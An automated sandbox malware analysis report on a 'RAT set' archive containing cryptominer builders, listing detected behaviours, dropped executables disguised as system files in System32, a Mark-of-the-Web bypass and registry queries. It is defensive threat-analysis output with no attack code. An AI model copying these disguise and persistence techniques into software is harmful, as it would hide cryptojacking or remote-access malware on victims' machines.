Malware Analysis Report

2025-04-13 21:13

Sample ID 250315-zpj6gaszfx
Target whoisthisugly's RAT set.rar
SHA256 c866056155f15ef43598ffdfc6d0bc5dd8f2f13b6c07f489c29feb9dbf6287b7
Tags
defense_evasion discovery execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

c866056155f15ef43598ffdfc6d0bc5dd8f2f13b6c07f489c29feb9dbf6287b7

Threat Level: Likely malicious

The file whoisthisugly's RAT set.rar was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery execution

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

Drops file in System32 directory

Drops file in Windows directory

Subvert Trust Controls: Mark-of-the-Web Bypass

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Kills process with taskkill

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

NTFS ADS

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-15 20:54

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-15 20:53

Reported

2025-03-15 21:15

Platform

win11-20250313-en

Max time kernel

1085s

Max time network

1092s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\whoisthisugly's RAT set.rar"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO45491668\Silent XMR Miner Builder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Windows\system32\Microsoft\Telemetry\sihost32.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd.exe N/A
N/A N/A C:\Windows\system32\services32.exe N/A
N/A N/A C:\Windows\system32\Microsoft\Telemetry\sihost32.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd.exe N/A
N/A N/A C:\Windows\system32\services32.exe N/A
N/A N/A C:\Windows\system32\Microsoft\Telemetry\sihost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe N/A
N/A N/A C:\Windows\system32\services32.exe N/A
N/A N/A C:\Windows\system32\Microsoft\Telemetry\sihost32.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe C:\Users\Admin\Downloads\ddd-miner.exe N/A
File created C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\Microsoft\Telemetry\sihost32.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\Microsoft\Telemetry\sihost32.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\Microsoft\Telemetry\sihost32.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5932_1600356437\LICENSE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5932_1600356437\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5932_1600356437\sets.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5932_1600356437\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5932_1600356437\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\TaskManager Installer.exe:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\Downloads\TaskManager Installer (1).exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\TaskManager Installer (2).exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
